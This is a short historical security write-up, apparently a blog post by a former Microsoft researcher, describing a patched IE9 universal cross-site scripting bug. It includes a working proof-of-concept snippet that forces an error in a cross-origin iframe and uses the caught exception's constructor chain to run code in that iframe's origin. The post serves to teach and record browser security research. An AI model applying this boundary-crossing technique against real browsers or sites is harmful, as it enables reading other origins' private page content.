IE9 UXSS: Generate an Error in an IFrame and Grab the Exception Object

Deliberately causing an error inside a cross-origin IFrame and catching the exception gave access to the exception object’s constructor chain, which led to the Function constructor of the IFrame’s script engine. Code created through that constructor executed in the IFrame’s security context.

try {
    window[0].postMessage(); // Generates "Argument not optional" inside the IFrame
} catch (xException) {
    var xFunction = xException.constructor.constructor;
    xFunction("alert(document.URL + '\\n\\n' + document.body.innerText)")();
}

Calling postMessage() without arguments was the most reliable way to force an error inside the IFrame from outside it. The thrown exception crossed the security boundary into the parent’s catch block. The exception object’s .constructor was Error, and Error.constructor was Function — but the Function that ran in the IFrame’s script context, not the parent’s. Calling that constructor created code with access to the IFrame’s document.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE9 UXSS: Window Members Set in onunload Persist Across Cross-Origin Navigation] :: [IE9 Information Disclosure: Detecting When the XSS Filter Has Activated] >